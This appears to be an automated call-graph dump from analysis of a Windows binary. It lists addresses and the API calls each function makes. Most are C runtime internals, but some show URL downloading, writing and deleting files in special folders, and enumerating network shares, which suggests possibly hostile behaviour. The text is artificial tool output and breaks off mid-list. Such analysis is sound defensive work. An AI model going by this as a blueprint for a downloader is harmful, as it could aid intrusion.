__invalid_parameter_noinfo_noreturn 39914->39936 39916 f20504 39917 f0e725 39916->39917 39961 f264ef 78 API calls 7 library calls 39916->39961 39919 f21f2d 39917->39919 39920 f21f39 _ungetc 39919->39920 39921 f21f4a 39920->39921 39922 f21f5f _wprintf 39920->39922 39923 f25208 ___crtsetenv 58 API calls 39921->39923 39997 f20e92 39922->39997 39924 f21f4f 39923->39924 40013 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39924->40013 39927 f21f6f _wprintf 40002 f2afd2 39927->40002 39928 f21f5a _ungetc 39928->39882 39930 f21f82 _wprintf 39931 f26ab6 __output_l 83 API calls 39930->39931 39932 f21f9b _wprintf 39931->39932 40009 f2afa1 39932->40009 39936->39917 39962 f2019c 39937->39962 39940 f25208 ___crtsetenv 58 API calls 39941 f26b30 39940->39941 39942 f27601 39941->39942 39954 f26b50 __output_l __aulldvrm _strlen 39941->39954 39977 f2816b 39941->39977 39943 f25208 ___crtsetenv 58 API calls 39942->39943 39944 f27606 39943->39944 39986 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39944->39986 39946 f275db 39970 f2a77e 39946->39970 39949 f275fd 39949->39916 39951 f2766a 78 API calls __output_l 39951->39954 39952 f271b9 DecodePointer 39952->39954 39953 f20bed _free 58 API calls 39953->39954 39954->39942 39954->39946 39954->39951 39954->39952 39954->39953 39956 f2721c DecodePointer 39954->39956 39957 f27241 DecodePointer 39954->39957 39958 f3adf7 60 API calls __cftof 39954->39958 39959 f276de 78 API calls _write_string 39954->39959 39960 f276b2 78 API calls _write_multi_char 39954->39960 39984 f22bcc 58 API calls _LocaleUpdate::_LocaleUpdate 39954->39984 39985 f28cde 58 API calls 2 library calls 39954->39985 39956->39954 39957->39954 39958->39954 39959->39954 39960->39954 39961->39917 39963 f201fa 39962->39963 39964 f201ad 39962->39964 39963->39940 39987 f25007 39964->39987 39966 f201b3 39968 f201da 39966->39968 39992 f245dc 58 API calls 6 library calls 39966->39992 39968->39963 39993 f2495e 58 API calls 6 library calls 39968->39993 39971 f2a786 39970->39971 39972 f2a788 IsProcessorFeaturePresent 39970->39972 39971->39949 39974 f2ab9c 39972->39974 39995 f2ab4b 5 API calls ___raise_securityfailure 39974->39995 39976 f2ac7f 39976->39949 39978 f28175 39977->39978 39979 f2818a 39977->39979 39980 f25208 ___crtsetenv 58 API calls 39978->39980 39979->39954 39981 f2817a 39980->39981 39996 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 39981->39996 39983 f28185 39983->39954 39984->39954 39985->39954 39986->39946 39988 f2501f __getptd_noexit 58 API calls 39987->39988 39989 f2500d 39988->39989 39990 f2501a 39989->39990 39994 f27c2e 58 API calls 3 library calls 39989->39994 39990->39966 39992->39968 39993->39963 39995->39976 39996->39983 39998 f20eb3 EnterCriticalSection 39997->39998 39999 f20e9d 39997->39999 39998->39927 40000 f28af7 __lock 58 API calls 39999->40000 40001 f20ea6 40000->40001 40001->39927 40003 f2816b __fgetwc_nolock 58 API calls 40002->40003 40004 f2afdf 40003->40004 40015 f389c2 40004->40015 40006 f2afe5 _wprintf 40007 f2b034 40006->40007 40024 f28cde 58 API calls 2 library calls 40006->40024 40007->39930 40010 f21faf 40009->40010 40011 f2afaa 40009->40011 40014 f21fc9 LeaveCriticalSection LeaveCriticalSection _wprintf __getstream 40010->40014 40011->40010 40026 f2836b 40011->40026 40013->39928 40014->39928 40016 f389da 40015->40016 40017 f389cd 40015->40017 40019 f25208 ___crtsetenv 58 API calls 40016->40019 40021 f389e6 40016->40021 40018 f25208 ___crtsetenv 58 API calls 40017->40018 40020 f389d2 40018->40020 40022 f38a07 40019->40022 40020->40006 40021->40006 40025 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40022->40025 40024->40007 40025->40020 40027 f2837e 40026->40027 40031 f283a2 40026->40031 40028 f2816b __fgetwc_nolock 58 API calls 40027->40028 40027->40031 40029 f2839b 40028->40029 40032 f2df14 40029->40032 40031->40010 40033 f2df20 _ungetc 40032->40033 40034 f2df44 40033->40034 40035 f2df2d 40033->40035 40037 f2dfe3 40034->40037 40039 f2df58 40034->40039 40132 f251d4 58 API calls __getptd_noexit 40035->40132 40136 f251d4 58 API calls __getptd_noexit 40037->40136 40038 f2df32 40041 f25208 ___crtsetenv 58 API calls 40038->40041 40042 f2df80 40039->40042 40043 f2df76 40039->40043 40052 f2df39 _ungetc 40041->40052 40060 f3b134 40042->40060 40133 f251d4 58 API calls __getptd_noexit 40043->40133 40044 f2df7b 40048 f25208 ___crtsetenv 58 API calls 40044->40048 40047 f2df86 40049 f2df99 40047->40049 40050 f2dfac 40047->40050 40051 f2dfef 40048->40051 40069 f2e003 40049->40069 40053 f25208 ___crtsetenv 58 API calls 40050->40053 40137 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40051->40137 40052->40031 40056 f2dfb1 40053->40056 40134 f251d4 58 API calls __getptd_noexit 40056->40134 40057 f2dfa5 40135 f2dfdb LeaveCriticalSection __unlock_fhandle 40057->40135 40061 f3b140 _ungetc 40060->40061 40062 f3b18f EnterCriticalSection 40061->40062 40064 f28af7 __lock 58 API calls 40061->40064 40063 f3b1b5 _ungetc 40062->40063 40063->40047 40065 f3b165 40064->40065 40066 f3b17d 40065->40066 40138 f3263e InitializeCriticalSectionAndSpinCount 40065->40138 40139 f3b1b9 LeaveCriticalSection _doexit 40066->40139 40070 f2e010 __ftell_nolock 40069->40070 40071 f2e06e 40070->40071 40072 f2e04f 40070->40072 40105 f2e044 40070->40105 40077 f2e0c6 40071->40077 40078 f2e0aa 40071->40078 40140 f251d4 58 API calls __getptd_noexit 40072->40140 40073 f2a77e __ld12tod 6 API calls 40075 f2e864 40073->40075 40075->40057 40076 f2e054 40079 f25208 ___crtsetenv 58 API calls 40076->40079 40080 f2e0df 40077->40080 40144 f2f744 60 API calls 3 library calls 40077->40144 40142 f251d4 58 API calls __getptd_noexit 40078->40142 40082 f2e05b 40079->40082 40084 f389c2 __flsbuf 58 API calls 40080->40084 40141 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40082->40141 40087 f2e0ed 40084->40087 40085 f2e0af 40088 f25208 ___crtsetenv 58 API calls 40085->40088 40090 f2e446 40087->40090 40094 f25007 __putch_nolock 58 API calls 40087->40094 40089 f2e0b6 40088->40089 40143 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40089->40143 40092 f2e464 40090->40092 40093 f2e7d9 WriteFile 40090->40093 40095 f2e588 40092->40095 40103 f2e47a 40092->40103 40096 f2e439 GetLastError 40093->40096 40097 f2e678 40093->40097 40100 f2e119 GetConsoleMode 40094->40100 40107 f2e67d 40095->40107 40108 f2e593 40095->40108 40099 f2e406 40096->40099 40097->40099 40098 f2e812 40098->40105 40106 f25208 ___crtsetenv 58 API calls 40098->40106 40099->40098 40099->40105 40110 f2e566 40099->40110 40100->40090 40101 f2e158 40100->40101 40101->40090 40102 f2e168 GetConsoleCP 40101->40102 40102->40098 40129 f2e197 40102->40129 40103->40098 40103->40099 40104 f2e4e9 WriteFile 40103->40104 40104->40096 40104->40103 40105->40073 40109 f2e840 40106->40109 40107->40098 40111 f2e6f2 WideCharToMultiByte 40107->40111 40108->40098 40112 f2e5f8 WriteFile 40108->40112 40148 f251d4 58 API calls __getptd_noexit 40109->40148 40114 f2e571 40110->40114 40115 f2e809 40110->40115 40111->40096 40124 f2e739 40111->40124 40112->40096 40117 f2e647 40112->40117 40118 f25208 ___crtsetenv 58 API calls 40114->40118 40147 f251e7 58 API calls 3 library calls 40115->40147 40117->40097 40117->40099 40117->40108 40120 f2e576 40118->40120 40119 f2e741 WriteFile 40123 f2e794 GetLastError 40119->40123 40119->40124 40146 f251d4 58 API calls __getptd_noexit 40120->40146 40123->40124 40124->40097 40124->40099 40124->40107 40124->40119 40125 f4058c WriteConsoleW CreateFileW __putwch_nolock 40130 f2e2ed 40125->40130 40126 f2e280 WideCharToMultiByte 40126->40099 40128 f2e2bb WriteFile 40126->40128 40127 f3c76c 60 API calls __fgetwc_nolock 40127->40129 40128->40096 40128->40130 40129->40099 40129->40126 40129->40127 40129->40130 40145 f22d33 58 API calls __isleadbyte_l 40129->40145 40130->40096 40130->40099 40130->40125 40130->40129 40131 f2e315 WriteFile 40130->40131 40131->40096 40131->40130 40132->40038 40133->40044 40134->40057 40135->40052 40136->40044 40137->40052 40138->40066 40139->40062 40140->40076 40141->40105 40142->40085 40143->40105 40144->40080 40145->40129 40146->40105 40147->40105 40148->40105 40149->39888 40150->39891 40151->39894 40152->39898 40153->39906 40155 f13c62 40154->40155 40162 f13c74 _memset 40154->40162 40156 f13c67 40155->40156 40157 f13c96 40155->40157 40158 f23b4c 59 API calls 40156->40158 40171 f4f23e 59 API calls 2 library calls 40157->40171 40160 f13c6d 40158->40160 40160->40162 40172 f4f1bb 59 API calls 3 library calls 40160->40172 40162->39581 40165 f18513 40164->40165 40168 f18520 40164->40168 40165->40168 40173 f15810 40165->40173 40166 f18619 40166->39583 40168->40166 40169 f4f23e 59 API calls 40168->40169 40170 f16760 59 API calls 40168->40170 40169->40168 40170->40168 40174 f15823 40173->40174 40175 f158b6 40173->40175 40177 f16760 59 API calls 40174->40177 40179 f15841 _signal 40174->40179 40181 f4f23e 59 API calls 2 library calls 40175->40181 40178 f15833 40177->40178 40178->40168 40179->40168 40182->39585 40183->39588 40184->39591 40185->39596 40186->39598 40187->39618 40188->39618 40189->39643 40190->39643 40191->39651 40192->39651 40193->39656 40233 f21037 40194->40233 40196 f0c78a 40196->39669 40197 f20546 40196->40197 40198 f20550 40197->40198 40199 f20564 40197->40199 40200 f25208 ___crtsetenv 58 API calls 40198->40200 40199->39684 40201 f20555 40200->40201 40434 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40201->40434 40203 f20560 40203->39684 40206 f2110d _ungetc 40204->40206 40205 f2111e 40207 f25208 ___crtsetenv 58 API calls 40205->40207 40206->40205 40208 f2114c 40206->40208 40209 f21123 40207->40209 40213 f2112e _ungetc 40208->40213 40435 f20e53 40208->40435 40480 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40209->40480 40212 f2115b 40216 f2117d 40212->40216 40441 f29312 40212->40441 40213->39684 40481 f211b5 LeaveCriticalSection LeaveCriticalSection _fprintf 40216->40481 40218 f23a44 _ungetc 40217->40218 40219 f23a70 40218->40219 40220 f23a58 40218->40220 40222 f20e53 __lock_file 59 API calls 40219->40222 40226 f23a68 _ungetc 40219->40226 40221 f25208 ___crtsetenv 58 API calls 40220->40221 40223 f23a5d 40221->40223 40224 f23a82 40222->40224 40645 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40223->40645 40629 f239cc 40224->40629 40226->39669 40230->39671 40231->39676 40232->39680 40235 f21043 _ungetc 40233->40235 40234 f21056 40236 f25208 ___crtsetenv 58 API calls 40234->40236 40235->40234 40237 f21087 40235->40237 40238 f2105b 40236->40238 40252 f28df4 40237->40252 40282 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40238->40282 40241 f2108c 40242 f210a2 40241->40242 40243 f21095 40241->40243 40245 f210cc 40242->40245 40246 f210ac 40242->40246 40244 f25208 ___crtsetenv 58 API calls 40243->40244 40250 f21066 _ungetc @_EH4_CallFilterFunc@8 40244->40250 40267 f28f13 40245->40267 40248 f25208 ___crtsetenv 58 API calls 40246->40248 40248->40250 40250->40196 40253 f28e00 _ungetc 40252->40253 40254 f28af7 __lock 58 API calls 40253->40254 40264 f28e0e 40254->40264 40255 f28e82 40284 f28f0a 40255->40284 40256 f28e89 40288 f28cde 58 API calls 2 library calls 40256->40288 40259 f28eff _ungetc 40259->40241 40260 f28e90 40260->40255 40289 f3263e InitializeCriticalSectionAndSpinCount 40260->40289 40261 f28b9f __mtinitlocknum 58 API calls 40261->40264 40262 f20e92 _wprintf 59 API calls 40262->40264 40264->40255 40264->40256 40264->40261 40264->40262 40287 f20efc LeaveCriticalSection LeaveCriticalSection _doexit 40264->40287 40265 f28eb6 EnterCriticalSection 40265->40255 40268 f28f33 __wsetlocale_nolock 40267->40268 40269 f28f4d 40268->40269 40281 f29108 40268->40281 40295 f3c232 60 API calls 2 library calls 40268->40295 40270 f25208 ___crtsetenv 58 API calls 40269->40270 40271 f28f52 40270->40271 40294 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40271->40294 40273 f2916b 40291 f3c214 40273->40291 40275 f210d7 40283 f210f9 LeaveCriticalSection LeaveCriticalSection _fprintf 40275->40283 40277 f29101 40277->40281 40296 f3c232 60 API calls 2 library calls 40277->40296 40279 f29120 40279->40281 40297 f3c232 60 API calls 2 library calls 40279->40297 40281->40269 40281->40273 40282->40250 40283->40250 40290 f28c81 LeaveCriticalSection 40284->40290 40286 f28f11 40286->40259 40287->40264 40288->40260 40289->40265 40290->40286 40298 f3b9f8 40291->40298 40293 f3c22d 40293->40275 40294->40275 40295->40277 40296->40279 40297->40281 40301 f3ba04 _ungetc 40298->40301 40299 f3ba1a 40300 f25208 ___crtsetenv 58 API calls 40299->40300 40302 f3ba1f 40300->40302 40301->40299 40303 f3ba50 40301->40303 40381 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40302->40381 40309 f3bac1 40303->40309 40307 f3ba29 _ungetc 40307->40293 40310 f3bae1 40309->40310 40383 f47f50 40310->40383 40313 f3c213 40314 f3bafd 40315 f3bb37 40314->40315 40320 f3bb5a 40314->40320 40356 f3bc34 40314->40356 40414 f251d4 58 API calls __getptd_noexit 40315->40414 40317 f3bb3c 40318 f25208 ___crtsetenv 58 API calls 40317->40318 40319 f3bb49 40318->40319 40415 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40319->40415 40321 f3bc18 40320->40321 40329 f3bbf6 40320->40329 40416 f251d4 58 API calls __getptd_noexit 40321->40416 40324 f3ba6c 40382 f3ba95 LeaveCriticalSection __unlock_fhandle 40324->40382 40325 f3bc1d 40326 f25208 ___crtsetenv 58 API calls 40325->40326 40327 f3bc2a 40326->40327 40417 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40327->40417 40390 f3b1c2 40329->40390 40331 f3bcc4 40332 f3bcf1 40331->40332 40333 f3bcce 40331->40333 40408 f3b88d 40332->40408 40418 f251d4 58 API calls __getptd_noexit 40333->40418 40336 f3bcd3 40338 f25208 ___crtsetenv 58 API calls 40336->40338 40337 f3bd91 GetFileType 40339 f3bdde 40337->40339 40340 f3bd9c GetLastError 40337->40340 40342 f3bcdd 40338->40342 40421 f3b56e 59 API calls 2 library calls 40339->40421 40420 f251e7 58 API calls 3 library calls 40340->40420 40341 f3bd5f GetLastError 40419 f251e7 58 API calls 3 library calls 40341->40419 40346 f25208 ___crtsetenv 58 API calls 40342->40346 40346->40324 40347 f3bdc3 CloseHandle 40349 f3bdd1 40347->40349 40350 f3bd84 40347->40350 40348 f3b88d ___createFile 3 API calls 40351 f3bd54 40348->40351 40353 f25208 ___crtsetenv 58 API calls 40349->40353 40354 f25208 ___crtsetenv 58 API calls 40350->40354 40351->40337 40351->40341 40355 f3bdd6 40353->40355 40354->40356 40355->40350 40429 f242fd 8 API calls 2 library calls 40356->40429 40357 f3bfb7 40357->40356 40361 f3c18a CloseHandle 40357->40361 40358 f3bdfc 40358->40357 40376 f3be7d 40358->40376 40422 f2f744 60 API calls 3 library calls 40358->40422 40360 f3be66 40360->40376 40423 f251d4 58 API calls __getptd_noexit 40360->40423 40362 f3b88d ___createFile 3 API calls 40361->40362 40363 f3c1b1 40362->40363 40366 f3c041 40363->40366 40367 f3c1b9 GetLastError 40363->40367 40365 f2b5c4 70 API calls __read_nolock 40365->40376 40366->40356 40427 f251e7 58 API calls 3 library calls 40367->40427 40371 f3be85 40371->40376 40424 f30b25 61 API calls 3 library calls 40371->40424 40425 f47cac 82 API calls 6 library calls 40371->40425 40374 f2f744 60 API calls __lseeki64_nolock 40374->40376 40375 f2df14 __write 78 API calls 40375->40376 40376->40357 40376->40365 40376->40371 40376->40374 40376->40375 40377 f3c034 40376->40377 40426 f30b25 61 API calls 3 library calls 40377->40426 40379 f3c03b 40380 f25208 ___crtsetenv 58 API calls 40379->40380 40380->40366 40381->40307 40382->40307 40384 f47f6f 40383->40384 40385 f47f5a 40383->40385 40384->40314 40386 f25208 ___crtsetenv 58 API calls 40385->40386 40387 f47f5f 40386->40387 40430 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40387->40430 40389 f47f6a 40389->40314 40391 f3b1ce _ungetc 40390->40391 40392 f28b9f __mtinitlocknum 58 API calls 40391->40392 40393 f3b1df 40392->40393 40394 f28af7 __lock 58 API calls 40393->40394 40395 f3b1e4 _ungetc 40393->40395 40404 f3b1f2 40394->40404 40395->40331 40396 f3b340 40433 f3b362 LeaveCriticalSection _doexit 40396->40433 40398 f3b2d2 40399 f28c96 __calloc_crt 58 API calls 40398->40399 40402 f3b2db 40399->40402 40400 f3b272 EnterCriticalSection 40403 f3b282 LeaveCriticalSection 40400->40403 40400->40404 40401 f28af7 __lock 58 API calls 40401->40404 40402->40396 40405 f3b134 ___lock_fhandle 59 API calls 40402->40405 40403->40404 40404->40396 40404->40398 40404->40400 40404->40401 40431 f3263e InitializeCriticalSectionAndSpinCount 40404->40431 40432 f3b29a LeaveCriticalSection _doexit 40404->40432 40405->40396 40409 f3b898 ___crtIsPackagedApp 40408->40409 40410 f3b8f3 CreateFileW 40409->40410 40411 f3b89c GetModuleHandleW GetProcAddress 40409->40411 40413 f3b911 40410->40413 40412 f3b8b9 40411->40412 40412->40413 40413->40337 40413->40341 40413->40348 40414->40317 40415->40324 40416->40325 40417->40356 40418->40336 40419->40350 40420->40347 40421->40358 40422->40360 40423->40376 40424->40371 40425->40371 40426->40379 40429->40313 40430->40389 40431->40404 40432->40404 40433->40395 40434->40203 40436 f20e63 40435->40436 40437 f20e85 EnterCriticalSection 40435->40437 40436->40437 40438 f20e6b 40436->40438 40439 f20e7b 40437->40439 40440 f28af7 __lock 58 API calls 40438->40440 40439->40212 40440->40439 40442 f294a3 40441->40442 40443 f2932b 40441->40443 40479 f2938a 40442->40479 40505 f3c784 72 API calls 4 library calls 40442->40505 40444 f2816b __fgetwc_nolock 58 API calls 40443->40444 40446 f29331 40444->40446 40447 f29354 40446->40447 40448 f2816b __fgetwc_nolock 58 API calls 40446->40448 40450 f293c0 40447->40450 40451 f2936d 40447->40451 40449 f2933d 40448->40449 40449->40447 40452 f2816b __fgetwc_nolock 58 API calls 40449->40452 40450->40442 40453 f2816b __fgetwc_nolock 58 API calls 40450->40453 40454 f2b2f2 __filbuf 72 API calls 40451->40454 40457 f29372 40451->40457 40455 f29349 40452->40455 40456 f293d0 40453->40456 40454->40457 40458 f2816b __fgetwc_nolock 58 API calls 40455->40458 40459 f293f3 40456->40459 40462 f2816b __fgetwc_nolock 58 API calls 40456->40462 40460 f2b2f2 __filbuf 72 API calls 40457->40460 40457->40479 40458->40447 40459->40442 40461 f2940e 40459->40461 40460->40479 40463 f29416 40461->40463 40482 f2b2f2 40461->40482 40464 f293dc 40462->40464 40463->40479 40502 f22d33 58 API calls __isleadbyte_l 40463->40502 40464->40459 40466 f2816b __fgetwc_nolock 58 API calls 40464->40466 40467 f293e8 40466->40467 40469 f2816b __fgetwc_nolock 58 API calls 40467->40469 40469->40459 40470 f2943e 40471 f29473 40470->40471 40473 f29448 40470->40473 40474 f2b2f2 __filbuf 72 API calls 40470->40474 40504 f3c76c 60 API calls __woutput_l 40471->40504 40473->40471 40476 f29460 40473->40476 40474->40473 40475 f29487 40478 f25208 ___crtsetenv 58 API calls 40475->40478 40475->40479 40503 f3c607 60 API calls 4 library calls 40476->40503 40478->40479 40479->40212 40480->40213 40481->40213 40483 f2b312 40482->40483 40484 f2b2fd 40482->40484 40488 f2b347 40483->40488 40493 f2b30d 40483->40493 40540 f38a16 58 API calls __malloc_crt 40483->40540 40485 f25208 ___crtsetenv 58 API calls 40484->40485 40486 f2b302 40485->40486 40539 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40486->40539 40490 f2816b __fgetwc_nolock 58 API calls 40488->40490 40491 f2b35b 40490->40491 40506 f2b4b0 40491->40506 40493->40463 40494 f2b362 40494->40493 40495 f2816b __fgetwc_nolock 58 API calls 40494->40495 40496 f2b385 40495->40496 40496->40493 40497 f2816b __fgetwc_nolock 58 API calls 40496->40497 40498 f2b391 40497->40498 40498->40493 40499 f2816b __fgetwc_nolock 58 API calls 40498->40499 40500 f2b39e 40499->40500 40501 f2816b __fgetwc_nolock 58 API calls 40500->40501 40501->40493 40502->40470 40503->40479 40504->40475 40505->40479 40507 f2b4bc _ungetc 40506->40507 40508 f2b4e0 40507->40508 40509 f2b4c9 40507->40509 40511 f2b5a4 40508->40511 40514 f2b4f4 40508->40514 40609 f251d4 58 API calls __getptd_noexit 40509->40609 40614 f251d4 58 API calls __getptd_noexit 40511->40614 40513 f2b4ce 40515 f25208 ___crtsetenv 58 API calls 40513->40515 40516 f2b512 40514->40516 40517 f2b51f 40514->40517 40534 f2b4d5 _ungetc 40515->40534 40610 f251d4 58 API calls __getptd_noexit 40516->40610 40518 f2b541 40517->40518 40519 f2b52c 40517->40519 40522 f3b134 ___lock_fhandle 59 API calls 40518->40522 40611 f251d4 58 API calls __getptd_noexit 40519->40611 40526 f2b547 40522->40526 40523 f25208 ___crtsetenv 58 API calls 40527 f2b539 40523->40527 40524 f2b517 40524->40523 40525 f2b531 40528 f25208 ___crtsetenv 58 API calls 40525->40528 40529 f2b55a 40526->40529 40530 f2b56d 40526->40530 40615 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40527->40615 40528->40527 40541 f2b5c4 40529->40541 40533 f25208 ___crtsetenv 58 API calls 40530->40533 40536 f2b572 40533->40536 40534->40494 40535 f2b566 40613 f2b59c LeaveCriticalSection __unlock_fhandle 40535->40613 40612 f251d4 58 API calls __getptd_noexit 40536->40612 40539->40493 40540->40488 40542 f2b5e5 40541->40542 40543 f2b5fc 40541->40543 40616 f251d4 58 API calls __getptd_noexit 40542->40616 40545 f2bd34 40543->40545 40549 f2b636 40543->40549 40627 f251d4 58 API calls __getptd_noexit 40545->40627 40546 f2b5ea 40548 f25208 ___crtsetenv 58 API calls 40546->40548 40591 f2b5f1 40548->40591 40552 f2b63e 40549->40552 40557 f2b655 40549->40557 40550 f2bd39 40551 f25208 ___crtsetenv 58 API calls 40550->40551 40553 f2b64a 40551->40553 40617 f251d4 58 API calls __getptd_noexit 40552->40617 40628 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40553->40628 40555 f2b643 40561 f25208 ___crtsetenv 58 API calls 40555->40561 40558 f2b66a 40557->40558 40560 f2b684 40557->40560 40562 f2b6a2 40557->40562 40557->40591 40618 f251d4 58 API calls __getptd_noexit 40558->40618 40560->40558 40566 f2b68f 40560->40566 40561->40553 40619 f28cde 58 API calls 2 library calls 40562->40619 40564 f2b6b2 40567 f2b6d5 40564->40567 40568 f2b6ba 40564->40568 40565 f389c2 __flsbuf 58 API calls 40569 f2b7a3 40565->40569 40566->40565 40621 f2f744 60 API calls 3 library calls 40567->40621 40570 f25208 ___crtsetenv 58 API calls 40568->40570 40571 f2b81c ReadFile 40569->40571 40576 f2b7b9 GetConsoleMode 40569->40576 40591->40535 40609->40513 40610->40524 40611->40525 40612->40535 40613->40534 40614->40524 40615->40534 40616->40546 40617->40555 40618->40555 40619->40564 40621->40566 40627->40550 40628->40591 40630 f239db 40629->40630 40631 f239ef 40629->40631 40632 f25208 ___crtsetenv 58 API calls 40630->40632 40633 f2836b __flush 78 API calls 40631->40633 40637 f239eb 40631->40637 40634 f239e0 40632->40634 40636 f239fb 40633->40636 40647 f242d2 9 API calls __invalid_parameter_noinfo_noreturn 40634->40647 40648 f30bbf 58 API calls _free 40636->40648 40646 f23aa7 LeaveCriticalSection LeaveCriticalSection _fprintf 40637->40646 40639 f23a03 40640 f2816b __fgetwc_nolock 58 API calls 40639->40640 40641 f23a09 40640->40641 40649 f30a4a 63 API calls 6 library calls 40641->40649 40643 f23a0f 40643->40637 40644 f20bed _free 58 API calls 40643->40644 40644->40637 40645->40226 40646->40226 40647->40637 40648->40639 40649->40643 40651 f15ab8 40650->40651 40652 f159e8 40650->40652 40729 f4f26c 59 API calls 3 library calls 40651->40729 40654 f15ac2 40652->40654 40655 f15a02 40652->40655 40730 f4f23e 59 API calls 2 library calls 40654->40730 40657 f15a1a 40655->40657 40658 f15acc 40655->40658 40666 f15a2a _signal 40655->40666 40660 f16950 59 API calls 40657->40660 40657->40666 40731 f4f23e 59 API calls 2 library calls 40658->40731 40660->40666 40666->39698 40729->40654 40862 f23f74 40819->40862 40822 f1f196 Sleep 40823 f1f1c1 40822->40823 40824 f1f94b 40822->40824 40825 f10a50 65 API calls 40823->40825 40826 f14690 59 API calls 40824->40826 40837 f1f1cd 40825->40837 40827 f1f97a 40826->40827 40923 f10160 89 API calls 5 library calls 40827->40923 40828 f1f216 40830 f15c10 59 API calls 40828->40830 40831 f1f274 40830->40831 40865 f0f730 40831->40865 40833 f1f9c1 SendMessageW 40835 f1f9e1 40833->40835 40858 f1f8af 40833->40858 40834 f20235 _TranslateName 60 API calls 40834->40837 40835->40858 40836 f111c0 170 API calls 40838 f1f987 40836->40838 40837->40828 40837->40834 40838->40833 40838->40836 40840 f11ab0 PeekMessageW DispatchMessageW PeekMessageW 40838->40840 40839 f1f281 40841 f1f392 40839->40841 40842 f15c10 59 API calls 40839->40842 40847 f0f730 192 API calls 40839->40847 40840->40838 40843 f15c10 59 API calls 40841->40843 40848 f0f730 192 API calls 40841->40848 40854 f1f52c 40841->40854 40842->40839 40843->40841 40844 f1f689 40844->40844 40846 f15c10 59 API calls 40844->40846 40845 f1f5bd PeekMessageW 40845->40854 40850 f1f73e 40846->40850 40847->40839 40848->40841 40849 f14690 59 API calls 40849->40854 40852 f0f730 192 API calls 40850->40852 40851 f0f730 192 API calls 40851->40854 40861 f1f74b 40852->40861 40853 f1f5d6 DispatchMessageW PeekMessageW 40853->40854 40854->40844 40854->40845 40854->40849 40854->40851 40854->40853 40863 f25007 __putch_nolock 58 API calls 40862->40863 40864 f1f16a Sleep 40863->40864 40864->40822 40864->40858 40866 f11ab0 3 API calls 40865->40866 40875 f0f765 40866->40875 40867 f0f8b5 40868 f14690 59 API calls 40867->40868 40869 f0f8ea PathFindFileNameW 40868->40869 40871 f0f923 40869->40871 40870 f14690 59 API calls 40870->40875 40871->40871 40872 f15c10 59 API calls 40871->40872 40873 f0f98c 40872->40873 40874 f13520 59 API calls 40873->40874 40893 f0f9a8 _memmove 40874->40893 40875->40867 40875->40870 40876 f15ae0 59 API calls 40875->40876 40877 f20235 _TranslateName 60 API calls 40875->40877 40892 f0f927 40875->40892 40876->40875 40877->40875 40878 f0fa44 PathFindFileNameW 40878->40893 40879 f0fb28 40882 f15c10 59 API calls 40882->40893 40888 f13520 59 API calls 40888->40893 40892->40839 40893->40878 40893->40879 40893->40882 40893->40888 40923->40838 41026 f10bd0 WNetOpenEnumW 41023->41026 41025 f1fd95 SendMessageW 41027 f10c33 GlobalAlloc 41026->41027 41028 f10c1c 41026->41028 41031 f10c45 _memset 41027->41031 41028->41025 41029 f10c51 WNetEnumResourceW 41030 f10ea3 WNetCloseEnum 41029->41030 41029->41031 41030->41025 41031->41029 41032 f150c0 59 API calls 41031->41032 41033 f15c10 59 API calls 41031->41033 41034 f10bd0 59 API calls 41031->41034 41035 f18fd0 59 API calls 41031->41035 41032->41031 41033->41031 41034->41031 41035->41031 41037 f2f7c0 __ftell_nolock 41036->41037 41038 f1e6b6 timeGetTime 41037->41038 41039 f23f74 58 API calls 41038->41039 41040 f1e6cc 41039->41040 41106 f0c6a0 RegOpenKeyExW 41040->41106 41043 f1e72e InternetOpenW 41093 f1e6d4 _memset _strstr _wcsstr 41043->41093 41044 f1ea8d lstrlenA lstrcpyA lstrcpyA lstrlenA 41044->41093 41045 f1ea4c SHGetFolderPathA 41047 f1ea67 PathAppendA DeleteFileA 41045->41047 41045->41093 41047->41093 41048 f1eada lstrlenA 41048->41093 41049 f14690 59 API calls 41063 f1e7be _memmove 41049->41063 41050 f1ee4d 41053 f0ef50 58 API calls 41050->41053 41051 f15ae0 59 API calls 41051->41093 41052 f156d0 59 API calls 41052->41093 41058 f1ee5d 41053->41058 41055 f13ff0 59 API calls 41055->41093 41056 f12900 60 API calls 41056->41093 41057 f1eb53 lstrcpyW 41059 f1eb74 lstrlenA 41057->41059 41057->41093 41060 f13ea0 59 API calls 41058->41060 41064 f1eeb1 41058->41064 41061 f20c62 _malloc 58 API calls 41059->41061 41060->41058 41061->41093 41062 f159d0 59 API calls 41062->41093 41063->41049 41063->41093 41153 f0dd40 73 API calls 4 library calls 41063->41153 41066 f0ef50 58 API calls 41064->41066 41065 f1e8f3 lstrcpyW 41067 f1e943 InternetOpenUrlW InternetReadFile 41065->41067 41065->41093 41075 f1eec1 41066->41075 41069 f1e9ec InternetCloseHandle InternetCloseHandle 41067->41069 41070 f1e97c SHGetFolderPathA 41067->41070 41068 f1eb99 MultiByteToWideChar lstrcpyW 41068->41093 41069->41093 41070->41069 41071 f1e996 PathAppendA 41070->41071 41131 f220b6 41071->41131 41072 f1e93c lstrcatW 41072->41067 41073 f1ec3d lstrlenW lstrlenA lstrcpyA lstrcpyA lstrlenA 41073->41093 41077 f13ea0 59 API calls 41075->41077 41082 f1ef12 41075->41082 41076 f1ebf0 SHGetFolderPathA 41078 f1ec17 PathAppendA DeleteFileA 41076->41078 41076->41093 41077->41075 41078->41093 41079 f1e9c4 lstrlenA 41134 f22b02 41079->41134 41081 f1ecaa lstrlenA 41081->41093 41084 f13ff0 59 API calls 41082->41084 41083 f23a38 __fcloseall 83 API calls 41083->41093 41085 f1ef3a 41084->41085 41086 f12900 60 API calls 41085->41086 